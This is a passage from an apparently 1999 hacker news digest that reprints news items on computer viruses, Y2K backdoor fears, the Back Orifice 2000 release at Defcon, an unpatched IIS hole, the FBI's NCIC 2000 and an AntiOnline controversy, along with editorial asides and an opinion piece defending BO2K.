drive. In many cases, these hackers are people who enjoy the intellectual challenge of writing. In other situations, they are only after the publicity these viruses can receive, causing people to treat these crimes as less dangerous. "But (in the information age), a crime no longer requires a .45-calibre Magnum. We have to deal with these things in a far more serious manner. They do a lot of damage," said Robert Lendvai, vice-president of marketing at OLAP@Home Inc., an Ottawa-based software programmer. For instance, one Ottawa public relations firm had to close its doors for one day to repair the damage from the Melissa virus, he said. ITAC's Gauthier figured Canadian corporations and governments lose $100 million annually because of these computer bugs. That figure was extrapolated from the $1-billion US loss estimated to American corporations derived from an earlier U.S. study. Companies are getting help in the form of more sophisticated virus detection programs, now "a basic protection" for any smart firm, said David Lynch, vice-president of sales and marketing of KyberPASS Corp., an Ottawa-based electronic commerce software maker. These detection programs generally work by looking for indicators within a corporate computer system that change for an unexplained reason. In that case, the program will send a warning that you may have a problem. "But viruses are always going to be with us," he said. KyberPASS was hit by three viruses in the past year, two of which entered the system through the company's e-mail and one when someone in the corporation downloaded an outside file, Lynch said. "It's computer vandalism. Some of it is paint on the walls. And some is like throwing eggs at the door," he said. @HWA 05.0 Y2K Bug Fixes May Cause Other Problems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Sure, the programmers who are busy patching up old Cobal code to correct the massive Y2K problem may leave in their own backdoors. Of course that is possible but how widespread is this problem really? Is the claim of $1 Billion dollars lost accurate or just FUD? I guess there is no way to really know for sure. MSNBC http://www.msnbc.com/news/290746.asp More fud and sensationalism....; Beware the millennium bug repair The people hired to root out the Y2K bug could give themselves the keys to billions of corporate dollars By Jim Miklaszewski NBC NEWS CORRESPONDENT WASHINGTON, July 16 — Security experts believe that computer fraud, linked directly to the so-called Year 2000 computer bug, will cost America’s big business big money. In fact, one firm predicts that in a single computer theft, some American business will lose $1 billion. It could potentially be the biggest corporate heist in world history “CLEARLY, SOMEONE is going to be hit on their balance sheet pretty hard,” said Bob Mack, vice president of the Gartner Group. Ironically, the companies themselves may be hiring these potential computer crooks without even knowing it. Most major firms are using outside consultants to rid their computer systems of any potential Y2K bugs. But to do that, these consultants are given access to the companies deepest, darkest, most sensitive computer secrets and codes — leaving the companies and their computers wide open to theft. “They have to have access to your most critical systems. You’re essentially giving them the keys to the kingdom,” said Ira Winkler, chief of the president’s Security Advisors Group. The consultants, it’s feared, can insert their own codes into a company computer — trapdoors — that would permit them to hack back into the system at will. “They’re inserting malicious activity, if you will, into the code that will allow them to do things that the code was never allowed to do,” said Mike Higgins, of Para-Protect Services, of Alexandria, Va. Once inside, the computer thieves could electronically steal money or the companies’ latest trade secrets, be it the latest cure for cancer or design for a new sneakers, potentially worth billions of dollars. “Why do people hack into computers today in the business world?,” Higgins said. “Because that’s where the money is.” And global financial systems are largely electronically connected now, and the interconnection is only expected to increase. “Y2K remediation, by definition, creates and increases the opportunity for theft and fraud,” said Joe Pucciarelli, a Gartner analyst, in a statement on the company’s advisory. Advertisement “Given the enormity of the Y2K task, the vast number of people assigned to fix the problem, and the element of human foibles, at least one significant theft is likely to occur in the next five years,” Pucciarelli said. Corporations must keep a close eye on staffers and consultants working on Y2K projects, said Bob Mack, another Gartner analyst, in an interview. “The point we’re making is that there are things corporations can do to limit fraud,” Mack said. All Y2K bug-fixing efforts should be audited by third parties if possible, and detailed records should be kept on all Y2K projects. Once planted, these back doors could go undetected forever — leaving some companies vulnerable long after the Y2K New Year’s celebration. Mario Seminerio of ZDNN contributed to this report. @HWA 06.0 Security Fears are Slowing UK E-Commerce ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Fears over the lack of security on the internet is slowing the progression of e-commerce in the UK said attendees of TheEcademy an advisory group to the British government. This groups feels that these fears over the lack of security on the net are unfounded and misplaced. One attendee was quoted as saying "There is no security problem." What world do these guys live on? Tech Web http://www.techweb.com/wire/story/TWB19990716S0018 Scary Security Stories Hinder E-Commerce (07/16/99, 4:06 p.m. ET) By Madeleine Acey, TechWeb LONDON -- Unwarranted hype over the security risks of e-commerce has led to misplaced fear about setting up in Internet business. This was the view of IT vendors, analysts, and lawyers who gathered in London on Thursday to create an advisory document for the U.K. government on how to spur reluctant British businesses into e-commerce. The 50-member group, all part of TheEcademy -- an e-commerce education forum, also said regulation would be an inhibitor and had already held back progress. "There is no security problem," said Frederick Wilson of Lloyds TSB banking group. "There's only one problem -- people don't understand. We have to convince customers it is secure." Other delegates said people let technophobia cloud the issue and needed to realize e-commerce was no more insecure than any other type of business. "All the security and payment issues we have, have always existed in business," said one. "How secure is your shop or your head office?" said another. EDI works globally and has been around for years without issues, a third pointed out. Microsoft U.K. e-commerce business manager Peter Bell said Visa was the "biggest proponent" of scare stories. "They say there's 45 percent fraud on the Internet," he said. But online businesses like Expedia sold $1 million worth of travel tickets last year without one security incident, said Durlacher European Internet Analyst Sarah Skinner. A show of hands found most of the group felt the U.K. telecom industry and its regulation -- or lack of regulation -- was holding back e-commerce. Bell said British Telecommunications' contracts only let customers run data at 64K over their lines. "People should ignore it, let BT sue you," he said. Government regulation is supposed to ensure the near-monopoly BT operates fairly. Many agreed e-commerce worked best when governments didn't try to legislate for it. "Our objective would be to take as much regulation out of the equation as possible," said TheEcademy chairman Thomas Power. Russell Loarridge suggested the government publish a code of practice to prevent spamming -- people would only receive marketing e-mail if requested. Another delegate said the EU - led by a British Labor politician -- had already voted for the opposite. The group agreed the IT industry was partly to blame for resistance to e-commerce as it used language that was alien to many businesses. They said the success stories -- and how they were achieved -- should be publicized to counteract the fear of credit card details being stolen, payments not being made, and systems falling over. "We need people with the business experience to be visionaries to encourage the same sort of transition [as when businesses first moved from manual processes to computer systems]," one member of the discussion forum said. "People want to know, how has someone else done it," another offered, suggesting TheEcademy publish boilerplate guides to adopting e-commerce. A working document would be produced from the group's meeting, Power said, and be presented to the Department of Trade and Industry. @HWA 07.0 More Defc0n than you can shake three sticks at ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Forbes:http://www.forbes.com/tool/html/99/jul/0716/feat2.htm Defcon Live! By Adam L. Penenberg ildog, a member of the hacker group Cult of the Dead Cow, is lounging in his hotel suite, a smile smeared on his face. Being Las Vegas in July, the temperature outside is 100 degrees, but Dildog is air-conditioned cool. The unveiling of his latest software upgrade for Back Orifice--a not-so-subtle dig at Microsoft's Back Office--was a success, a raucous party that had more in common with a heavy metal concert than a software release. A gaggle of groupies, most of them in their twenties and dressed in noir black, with tattoos, piercings and scraggly hair, wait for him. They sit cross-legged on the carpet, availing themselves to a well-stocked minibar piled high with bottles of vodka, bourbon, whiskey. Cult of the Dead kicked off the conference with a laser-light show, culminating in a deafening electronic moo sound. Of the 3,000 hackers, crackers, geeks, "scene whores" (hacker groupies), computer security professionals, journalists, undercover cops and federal agents who attended this year's Defcon hacker convention, 2,000 of them crammed into a conference room at the Alexis Park Hotel to watch the "BO2K" release. Last year, Cult of the Dead Cow had chosen Defcon to release the first version of its Back Orifice. Written by fellow Cult member Sir Dystic, it works on Windows 95 and 98 machines by secretly creating a backdoor so that a remote user can control all functions on those computer. The upgrade Dildog coded is designed to work with networks that run on Windows NT, and it hides itself extremely well. While software makers, computer security companies, antivirus makers and law enforcement say the release of BO2K is just a way for hackers to legitimize illegal computer intrusions, Dildog claims he is just trying to point out potential problems with Microsoft's software. Computer security companies are "afraid to admit that their detection system is horribly and possibly irreparably flawed," he says. "[They] give people the impression their software 'raises the bar' against the average hacker. Unfortunately, this also fools people with really critical networks into thinking that this software is sufficient to protect them. People trusting this stuff to protect them from Trojan horses are in for a surprise." Cult of the Dead Cow members didn't come all the way to Las Vegas to disappoint, and they didn't. They kicked off the conference with a laser-light show, culminating in a deafening electronic moo sound. The crowd roared. Then, while Dildog and his associates explained their don't-blame-us-if-Microsoft-products-suck philosophy, a CD-ROM label was projected on the wall behind them, a cow head spinning and spinning. At the end of the presentation, Cult members flung some two dozen CD-ROMS containing the Back Orifice update. The crowd surged forward. Antivirus makers and computer security company reps watched closely, hoping to later corral someone with a copy. The first one to crack the program would win bragging rights, their names in a press release, perhaps even a mention in some magazine or newspaper articles as heros who thwarted the evil intentions of the Cult of the Dead Cow hacker gang. n employee of ISS, the big-time computer-security company based in Atlanta, Ga. threw himself into the mob and somehow snagged a copy. Within 24 hours, the company would crack parts of the program and release an application that could identify it. At the time, Dildog didn't know this, and even if he had he wouldn't have cared. In an earlier Internet conversation, an ISS employee approached him and asked how much of a bribe it would take for him to pass the company an advance copy of the software, he claims. As a joke, the Cult sent back a note saying it would take $1 million and a monster truck, the idea they ostensibly got from "Hack Heaven," the sham article written by former New Republic associate editor Stephen Glass. ISS denies the company ever offered money for the software. Some hackers thought the spectacle undermined Dildog's credibility and made him look arrogant. Although ISS has been more than happy to play up the fact that it can detect the software, Dildog says he fully expected that companies would not only reverse engineer it, they would soon come up with a removal tool. That is why he released his software as "open source." That means hackers the world over can tweak the code to suit their needs. For every new version that hits the Net, computer security companies will have to create new ways to counter it. Although antivirus makers have been pretty good at picking up polymorphic versions of the same program, it will be interesting to see what the overall impact of BO2K will be. Often, network administrators forget to apply the latest versions of antivirus software, or incorrectly configure parts of their network, leading to holes that would enable BO2K to fester. Already, BO2K has made it on to some hacker sites, bugs and all. Some users say the program has a tendency to crash and some files were improperly coded. But in the next couple of weeks or so, Cult of the Dead Cow plans to fix any glitches and post the new and improved program on its web site. From previous experience, Dildog knows that BO2K will then spread like a virus, morphing into perhaps dozens of different versions. The group claims it counted more than 300,000 downloads of the original Back Orifice, which ran solely on Windows 95 and 98 and was spread primarily by E-mail attachment. Who knows how many other copies were spread friend to friend, hacker to hacker, "cracker" to victim? Back in his hotel suite, Dildog's cool is slightly interrupted. When told some hackers who had attended his BO2K launch thought the spectacle undermined his credibility and made him look arrogant, he sniffed, "I never said I wasn't arrogant. Besides, why shouldn't every software release be like a rock concert?" (Though Mirco$crap did that in their presentations? - Ed) @HWA 08.0 How to Look Like a Hacker ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Some cool pictures in a rather mainstream place that attempts to cover what it thinks is Hacker Fashion. There are pictures from Defcon of Sir Dystic, Dark Tangent, Niki, Redrasta, Dr. Byte, and the whole cDc crew. Pity they missed my blue hair. Las Vegas Weekly http://www.lasvegasweekly.com/departments/07_14_99/fashion_defcon.html How to be a hacker ... or at least look like one Written and photographed by Anonymous I confess. In my younger daze I was a hacker. It was easier then. We worked on paper terminals that we accessed by sneaking into a local university library. We'd change grades, write stupid little programs and screw things up. We really didn't know what rules we were breaking. At that time, neither did the authorities. Today's hackers are a different lot. They are really savvy about the rules and how the game is played. Depending upon your own definition of evil, they are either on the dark side or the good side. It's a perfect yin yang. Wondering what today's generation of hackers looked like I went down to Defcon VII held last weekend here in Vegas. What I saw didn't surprise me. In fact it scared me. The following is a checklist on how to at least pretend you're a hacker. - Black t-shirts with esoteric statements, or corporate - logos (but only if the shirt is free), or those oh-so-comfy thrift-store clothes. - Black t-shirts with esoteric statements, or corporate logos (but only if the shirt is free), or those oh-so-comfy thrift-store clothes. - Sunglasses to protect your eyes against that big - bright yellow thing that is in the sky during what is called "daylight hours". - Black tribal tatoos to contrast against your skin made - pasty white from years of not going out into the sun. - A proper diet of pizza, beer, cigarettes and loads of caffeine. - A cold hard stare for anyone trying to take your picture because you're trying to remain anonymous even though the authorities who would be interested in your picture already have really good snapshots of you. A quick draw to cover your face is also necessary. - Strange jewelry, shoes, and backpacks. - Icons of the dead and almost dead. - That retro 20th century look. - Anything that makes Bill Gates look like the devil. - Come up with a cool cyber name like Death Veggy. @HWA 09.0 AV Vendors Still Scrambling Over BO2K ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Space Rogue Everyone wants a piece of the Anti BO2K press pie. Both Aladdin Knowledge Systems and BindView Development have announced products that claim to protect users from the malicious use of Back Orifice 2000. The BindView product looks like nothing more than a signature ID program, useless against an open source application such as BO2K. The Aladdin product actually looks interesting claiming to trap BO2K and other malicious email attachments in a 'sandbox' and detecting attempts to modify system files. This method should protect against the numerous mutations that will undoubtedly appear. Excite News - BindView http://news.excite.com/news/bw/990715/tx-bindview BindView Development - BO2K Advisory http://www.bindview.com/security/advisory/bo2K.html Excite News - Aladdin http://news.excite.com/news/bw/990713/wa-aladdin-knowledge eSafe - Aladdin's Security Product http://www.esafe.com/ 10.0 The Back Orifice 2000 Controversy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reprinted from HNN's Buffer Overflow with Eric's kind permission. By: Eric Ruppenthal Symantec, producers of Norton Anti-virus, along with many other anti-virus producing companies announced recently that it was classifying Back Orifice 2000 as a Trojan and or virus. This is a concerted effort to bar the competition of Cult of the Dead Cow in the network administration tool field. By using their anti-virus programs to keep computer users from using BO2K, these companies are engaging in unfair business tactics to keep a legitimate program from stealing the profits of their network administration tool programs. This creates a serious anti-trust problem. Back Orifice 2000 was produced by Cult of the Dead Cow (cDc) as an actual legitimate tool to be used to remotely administer Microsoft OS computer networks. It was introduced in Las Vegas on July 11, at DefCon 7. Since its official release to the public on July 14, every effort has been made to define this program not as a evil tool, but as something to be used in the real world of business. The program is free to any U.S. citizen who plans no exportation of it because of the encryption contained in the program. Many of the companies that produce anti-virus programs also deal in the network administration tool arena. The applications these companies produce are similar in functionality to BO2K with the difference being cDc offers their program free of charge. The companies see this factor as having the potential to seriously undermine their profit margins. So what do they do? They use a commonplace tool to remove this program as a threat; knowing full well that millions of computer systems in this country run anti-virus programs, including the networks this tool could be used on. They use this to their advantage by having it detect and label BO2K as a virus. This blatant attempt at monopolizing the network admin field thus blocks most attempts by any network administrator from using BO2K in a legitimate capacity without having to compromise virus protection. Symantec produces a program called PcAnywhere. Another company that is a close ally of Symantec is Microsoft. Microsoft is currently involved in a government anti-trust suit. Microsoft also makes a network administration tool called Systems Management Server that is integrated within the Microsoft BackOffice Suite. BO2K uses a little known hole that Microsoft deliberately placed in its OS source code to run in a stealth mode. Many of the enterprise management tools such as SMS from Microsoft do stealth remote control. Read the comparison of BO2K, Norton's PcAnywhere and Compaq's Carbon Copy 32 at http://www.bo2k.com/comparison.html They all have a silent install option and they all have silent remote control. SMS even has a configurator much like the BO2K wizard to configure the agent before sending it to the target machine. The technology of stealth monitoring and control was there way before BO2K. But these companies would have you believe that BO2K is the only tool inherently destructive towards computer systems because it is made by a well-known group of non-commercial programmers. What cDc has done is put it in everyones face and built a technologically superior solution that is free and open source. Any program has the potential to be misused. If there is a way for someone to exploit a hole in your computers defenses, it will be found. Microsoft is fully aware of the problems associated with powerful remote administration. Their SMS administration software has similar problems, by their own admission. From their page describing SMS; http://www.microsoft.com/smsmgmt/techdetails/remote.asp "Security of all the operations that Systems Management Server allows you to do on a client, remote control is possibly the most dangerous in terms of security. Once an administrator is remote controlling a client, he has as many rights and access to that machine as if he were sitting at it. Added to this, there is also the possibility of carrying out a remote control session without the user at the client being aware of it." Microsoft's site goes on to say, "It is possible to configure a remote control from a state where there is never any visible or audible indication that a remote control session is under way. It has been made this flexible due to customer demands ranging from one end of the spectrum to the other. When configuring the options available in the Remote Tools Client Agent properties, due notice must also be taken of company policy and local laws about what level of unannounced and unacknowledged intrusion is permitted." According to a press release by cDc, "In the past, Back Orifice has been used as a Trojan horse by script-kiddie crackers to annoy and sometimes harm Internet connected Windows machines. This is a fact of life with a tool that has the ability to be silently installed and can perform administration without end-user intervention. This, however, is not unique to Back Orifice. There are many Trojan horse programs out there, and many legitimate remote administration tools, that have the capability to perform quiet remote installations." Their statement goes on to say, "We have designed Back Orifice 2000 to meet user demands and to provide the most powerful remote administration available for the Microsoft Windows platform. Many people don't like to see free software like Back Orifice being used in replacement for expensive commercial products. So, they throw around statements like 'the program is only a malicious tool', and 'It has no legitimate purpose. The Microsoft Crypto API claims to provide 'strong encryption'. Of course, if you don't have the source code, you can't verify that this is true. We aren't taking that chance. Back Orifice 2000 encryption is proven strong, and we're not afraid to show you exactly how it's implemented." cDc has produced a program that is to be used in a legitimate business environment by a network administrator to aid in the administration of the computers they manage. They want you to know exactly how legit Back Orifice really is but these companies are trying to prevent this freely available tool from being released by using one of their own product line applications to suppress BO2K so that another of their products can flourish. Both Symantec and Microsoftís products stand to lose a good percentage of market shares if BO2K were allowed to be released free to the public and become a commonly used tool. All of these programs, not just BO2K, can be detrimental to any computer system if used in the wrong hands. BO2K must be given a chance to prove itself a legitimate tool and taken off the virus definitions lists. The open-source model has provided Back Orifice 2000 with a more than legitimate position in the industry and Back Orifice 2000 will grow to encompass all of the features of currently existing commercial remote administration tools. Says a member of cDc; "We're dedicated to empowering people with their technology." Submitted by: Eric Ruppenthal HFactorX International Organization @HWA 11.0 Year Old IIS Hole Still Causing Problems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A major hole in IIS announced by Microsoft last year has still not been patched by most customers. Eight lines of code is all that is needed to take full control at the system level of major popular web sites. The problem is that under certain conditions a user can connect directly to MS Access through IIS which then of course gives the attacker full system privileges. MSNBC http://www.msnbc.com/news/290621.asp Microsoft - Old http://www.microsoft.com/security/bulletins/ms98-004.asp Microsoft - New http://www.microsoft.com/security/bulletins/ms99-025.asp MSNBC; Year-old hole exposed big Web sites Compaq, Dell, Compuserve and others failed to heed Microsoft security warning and were left vulnerable By Bob Sullivan MSNBC July 19 — A security expert was able to demonstrate major vulnerabilities in big-name Web sites last week, including Dell Computer Corp., Compaq Computer Corp., PSINet, Compuserve and Nasdaq-Amex. The vulnerability, which was demonstrated to MSNBC, was simple but potentially devastating. It required as few as eight lines of computer code but could have exposed personal information, including credit card numbers. THE HOLE WAS actually announced by Microsoft on July 17 of last year — confirming a long-held suspicion that even large-scale information technology departments are having a tough time keeping up with the work required to maintain Web site security. The cat-and-mouse nature of security means Microsoft and other software vendors regularly issue bulletins with “patches” to security holes, or “exploits,” found and announced by hackers. As such recipes for hacking into sites make their way quickly through the hacking community, Web site administrators must meticulously follow each bulletin. In this case, many sites did not. “It’s one thing when there’s a problem” said Russ Cooper, who administers the popular NTBugTraq mailing list. Cooper publicized the flaw on his list Monday morning. “It’s another thing when companies know about something for a year and haven’t done anything.... These companies have just ignored Microsoft’s recommendation.” The flaw was discovered a year ago, and Microsoft published a "fix” and added it to the security checklist for Windows NT administrators. (Microsoft is a partner in MSNBC.) A new flavor of the same problem was discovered last week by Greg Gonzalez, vice president of Web services at ITE Inc., which hosts several e-commerce sites. He says his discovery meant that a hacker could write a simple eight-line program and gain administrative access to Web sites running Microsoft’s Internet Information Server Web server software — with no user name or password required. Sites that followed Microsoft’s instructions from a year ago would have been immune, but Gonzalez said about half the sites he checked were vulnerable. “With a lot of exploits you see ‘professional’ hackers writing code,” he said. “This exploit does not require anywhere near that level of expertise.” This morning, Microsoft re-issued its security alert about the problem “to serve as a reminder about this vulnerability, to restate the threat and encourage system administrators to evaluate their systems.” At the center of the problem, according to Cooper, is lack of due dilligence on the part of some companies to protect consumers’ private information. “Lots of companies went to the trouble of putting together a privacy statement. That’s all well and good,” he said, “But if companies don’t have an effective way of dealing with patches, with problems, what good is a privacy statement?” The problem is much more complicated than that, according to the chief technology officer at one of the big-name Web sites that was discovered to be vulnerable. “We get about 15-40 of these alerts every week,” the CTO, who asked not to be identified, told MSNBC. Despite staff who are dedicated to following up on security issues, lower-priority problems can slip through the cracks. “We’re not Fort Knox.... We rely on third parties to say whether they are yellow or red situations.” He says Microsoft downplayed the severity of the bug a year ago. Several other companies impacted by this security flaw declined comment. Spokespersons for Compuserve and PSINet said no personal information is stored on their Web sites, so there was no real danger to consumers. Compaq would only confirm that its site had been vulnerable but said the hole was patched after Microsoft security experts contacted Compaq recently. A spokeman for Dell said personal information was not at risk because such data is password protected, encrypted, and stored “elsewhere on its site.” “The net of it is when an issue arises, we need to be proactive to take care of our customers,”said Craig Beilinson, a product manager for Windows 2000 at Microsoft. The security hole itself involves the use of Microsoft’s database product, Access, in combination with its Web server software, Internet Information Server (IIS). Instead of connecting to a Web page in the traditional manner, a malicious hacker can connect directly to the Access database. From there, the hacker by default gains “system privileges,” and using Visual Basic can execute any command the Web administrator could. That would include downloading a list of user names and passwords, and the ability to connect to any other computer which feeds information to the Web server — including a database of credit cards and other personal information. Gonzalez, who found the new method last week while testing his own site for vulnerabilities, said the largest e-commerce sites may have an added layer of security that would have prevented easy access to critical data such as card numbers — perhaps storing such numbers on a different network, behind another user name and password. “The top 10 e-commerce sites may or may not have an additional layer,” he said. “But there’s a zillion other sites that aren’t going to have additional layers in place.” @HWA 12.0 NCIC 2000 Now Online ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by DaFed The FBI has announced a major new initiative in fighting crime, the National Crime Information Center 2000. This new system replaces the original NCIC, at a cost of $183.2 million, which was used since 1967. The NCIC 2000 indexes and cross references several different crime related databases such as those containing information on stolen guns, deported felons, missing persons and stolen vehicles. We sure hope that this version of NCIC is more secure than the last one. CNN http://www.cnn.com/TECH/computing/9907/19/system.idg/index.html FBI turns on new crime-fighting system July 19, 1999 Web posted at: 2:22 p.m. EDT (1822 GMT) by Scott Tillett From... (IDG) -- FBI officials announced today that they have successfully rolled out a massive new computer system that state and local law enforcement officials will use to fight crime. The new system, the National Crime Information Center 2000 -- like the original NCIC, which the FBI had used since 1967 -- allows crime fighters to search through 17 databases when investigating crimes or questioning criminal suspects. The databases include information on stolen guns, deported felons, missing persons and stolen vehicles, for example. NCIC 2000 will allow law enforcement officials with special hardware and software to transmit suspects' fingerprints to confirm their identity and to see if the suspects are wanted for other crimes. It also will allow the officials to view mug shots to confirm identities -- a capability the original NCIC did not have. Law enforcement officers also can use NCIC 2000 to identify relationships among information in the databases. For example, under the old NCIC, if someone stole a car and a gun as part of the same crime and if a law enforcement officer later stopped the car thief on the highway, the officer could use the system to find out easily that the car had been stolen. But he would not necessarily know that the car thief might also have a stolen gun. NCIC 2000 shows the connection, keeping related information on a crime linked together, FBI spokesman Stephen Fischer said. The new NCIC 2000 also adds name-search functionality. For example, a search for the name "James" would return alternate spellings, such as "Jim" or "Jimmy," Fischer said. NCIC 2000 went online after years of escalating costs and congressional finger-wagging. System architects originally envisioned NCIC 2000 costing about $80 million, but the final price was $183.2 million, Fischer said. The discrepancy between the original cost and the actual cost came in part because contractors originally were "overly ambitious" when estimating the project, Fischer said. NCIC 2000 went live on July 11, but bugs in the system, as well as FBI attention on the capture of suspected railroad killer Angel Maturino Resendez, delayed the unveiling of the system, Fischer said. He added that bugs in NCIC 2000 were fixed by Monday evening. The bugs related to connectivity with the National Instant Criminal Background Check System, which is used for approving gun purchases. That system draws on NCIC 2000 and other databases to approve or disapprove gun purchases. FBI officials will hold the formal ceremony unveiling NCIC 2000 next month in Clarksburg, W.Va. FBI turns on new crime-fighting system @HWA 13.0 E-commerce Increases Security Risk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Companies engaged in e-commerce are 57 percent more likely to suffer an information security breach than those that don't do business online, according to a survey published in ICSA Inc.'s Information Security magazine. The survey found that companies conducting business online are 57 percent more likely to experience a proprietary information leak and 24 percent more likely to experience an unwanted intrusion into their systems. Information Security Magazine- 1999 Information Security Industry Survey http://www.infosecuritymag.com/july99/charts.html @HWA 14.0 Cyberspace Relatively Safe ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Obviously a story written without much research, John Kroll claims that cyberspace is relatively safe. While his article pretty much only covers fraud on eBay the overall tone would give most people the wrong impression of life in cyberspace. Cleveland Live http://www.cleveland.com/business/news/fm19kro.ssf So far, cyberspace is reasonably safe Monday, July 19, 1999 By JOHN KROLL THE PLAIN DEALER Robert J. Guest is one in a million. Or at least one in 10,000. Guest, a 31-year-old Californian, pleaded guilty to fraud in a federal court in California last week, according to prosecutors. He admitted taking about $37,000 from bidders over eBay Inc.'s Internet auction site but never delivering the digital cameras, laptops and other merchandise he had promised. Sounds like another Internet horror story, right? Like all the hackers who are compromising our nation's defense and the Postal Service plan to start charging everyone who uses e-mail. Well, Internet auction fraud is like those threats - that is, it exists rarely, if at all. Almost every hack into a government computer has done nothing worse than apply some electronic graffiti. There is no government plan - that's none, zip, zero, zilch - to charge for e-mail. And fraud in Internet auctions is hard to find. Even though Thom Mrozek, a spokesman for the U.S. attorney's office that prosecuted Guest, told Bloomberg News that the case "demonstrates that the buyer needs to beware, particularly in the anonymous realm of the Internet," he says this is not an epidemic. Guest's was only the second prosecution in the country involving online auction fraud, Mrozek said. Of course, it could be the dirty dealing in the digital rooms of eBay is just flying under the radar. No federal prosecutor's going to go after some guy who rips off one or two buyers for maybe $50. Don't even ask about using state laws or small-claims court. As Parma Heights attorney Rodger A. Pelagalli told Plain Dealer technology reporter Chuck Melvin, if you get stung on eBay, your best weapon is likely to be a strongly worded letter. But Melvin, who did this week's package of stories on online auctions, says it seems that even penny-ante crime is rare. Less than 0.01 percent of the millions of eBay trades produce fraud complaints to eBay itself, the site told the New York Department of Consumer Affairs this year. That's fewer than one in every 10,000 trades. It sounds as if Diogenes should hang up his lamp and take his search for an honest man online. Headline news: Internet users don't cheat! Let's not get carried away. Like the old bank robber Yellow Kid Weil, today's electronic thieves probably still go "where the money is" - and for all the millions of trades on eBay, the take per trade is fairly low. But while we can't proclaim an Age of Innocence on the whole Internet, the low level of fraud at a big online auctioneer like eBay underlines the point Melvin makes in his report: If you've got anything you want to buy or sell, the Internet is now the place to be. Just watch out for uninvited Guests. ©1999 THE PLAIN DEALER. Used with permission @HWA 15.0 AntiOnline Under Investigation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by cult An article in the Ottawa Citizen details recent claims made by attrition.org about the activities and FBI investigation of AntiOnline founder John Vranesevich. Unfortunately this article has no comments from the FBI. John Vranesevich refused to discuss the matter with the reporter and is now threatening a lawsuit over the article. Ottawa Citizen http://www.ottawacitizen.com/hightech/990719/2623591.html Attrition.org- Negation http://www.attrition.org/negation/ottawa.html Late Update The Ottawa Citizen has either pulled or moved the above article. The folks at Attrition have been kind enough to archive a copy for your reading pleasure. Attrition.org - Spy vs Spy In Hacker Underworld http://www.attrition.org/~jericho/media/ottawa_citizen.spy_vs_spy_in_hacker_underworld http://www.ottawacitizen.com/hightech/990719/2623591.html The Ottawa Citizen Online Business Page Monday 19 July 1999 Spy vs. spy in the hacker underworld Network security expert is under investigation for attacks on U.S. government Web sites Bob Paquin The Ottawa Citizen In the murky world of hackers and crackers, appearances can be deceptive. "White hat" good guys, working for software or security firms, have occasionally been caught moonlighting as "black hat" rogues. Such appears to be the case with John Vranesevich, a network security expert and founder of top-rated hacker Web site AntiOnline. Mr. Vranesevich is currently under investigation by the FBI with regard to recent attacks on U.S. government Web sites. It is alleged that he may have employed hackers to target high profile sites in order to scoop the rest of the media with exclusive reporting. Mr. Vranesevich has denied the allegations. Brian Martin, also under FBI investigation for hacking, recently released a report on his Web site (www.attrition.org/negation/special) which details a series of links between Mr. Vranesevich and an alleged member of the hacker group Masters of Downloading, which claimed responsibility for the U.S. Senate Web site hack earlier this month. Mr. Martin, who researches hacker culture through his Web site, claims to have been tracking questionable AntiOnline reporting over the past year. Mr. Vranesevich, 20, has over the past couple of years become one of the most widely quoted and authoritative sources on hacking and security-related information.ÊBegun in late 1994 as a 5-megabyte high school hobby Web site, AntiOnline has since grown into a multi-domain business venture. ABC News has described it as a "Rick's Cafe in the Casablanca world of hacking."ÊBesides reporting on hacking news, the site offers a downloadable library of hacking software tools, archives of several hacker newsletters and journals, and copies of some of the hacked pages featured in reported stories. While growing increasingly popular with the mainstream media, however, Mr. Vranesevich has slowly built up a number of enemies among the hacker underground. Spurred, perhaps, by an extensive FBI and U.S. Department of Justice hacker crackdown, which resulted in raids on 20 suspected hackers across six states, Mr. Vranesevich declared a dramatic change of stance, distancing himself from the subjects he covers. In a "Change in Mission" notice posted on his Web site, Mr. Vranesevich said: "Unfortunately, I've found myself looking in the mirror with disgust these past few months. Looking back, I've seen myself talking with people who have broken into hundreds of governmental servers, stolen sensitive data from military sites, broken into atomic research centres, and yes, people who have even attempted to sell data to individuals that presented themselves as being foreign terrorists É Many times, I knew about these instances before hand, and could have stopped them." He also claimed to have been secretly working with the U.S. Airforce to develop a "profile of a hacker" for use in fighting "CyberCrime". Mr. Vranesevich's message concluded with a note to the thousands of hackers who read his site: "You yell and scream about freedom of speech, yet you destroy sites which have information that disagree with your opinions.ÊYou yell and scream about privacy, yet you install trojans into others' systems, and read their personal email and files. You truly are hypocrites.ÊAll of these grand manifestos that you develop are little more than excuses that you make up to justify your actions to yourself." Mr. Martin, on the other hand, alleges that many of the reports from AntiOnline, and subsequent follow-on reporting in other media outlets, have been exaggerated and sensationalized. "Not only had AntiOnline driven the media hype behind the stories, they put various government and Department of Defense organizations on full alert preparing for the fallout these attacks would cause," he states on his own Web site. In detailing the relationship between Mr. Vranesevich and the alleged hacker in questions, Mr. Martin notes that "the typical journalist/contact relationship did not exist, and in fact, AntiOnline may have been responsible for creating some of the news to report on É he pays people to break into sites in order to report on it as an exclusive." @HWA 16.0 Parse Defcon Video Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ryan Parse has posted several video clips of Defcon as well as interviewers from some of the luminaries present. Biztech TV http://biztechtv.com/admin/parse/defcon.asp @HWA 17.0 cDc Challenges Microsoft to Recall SMS (wicked!) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed 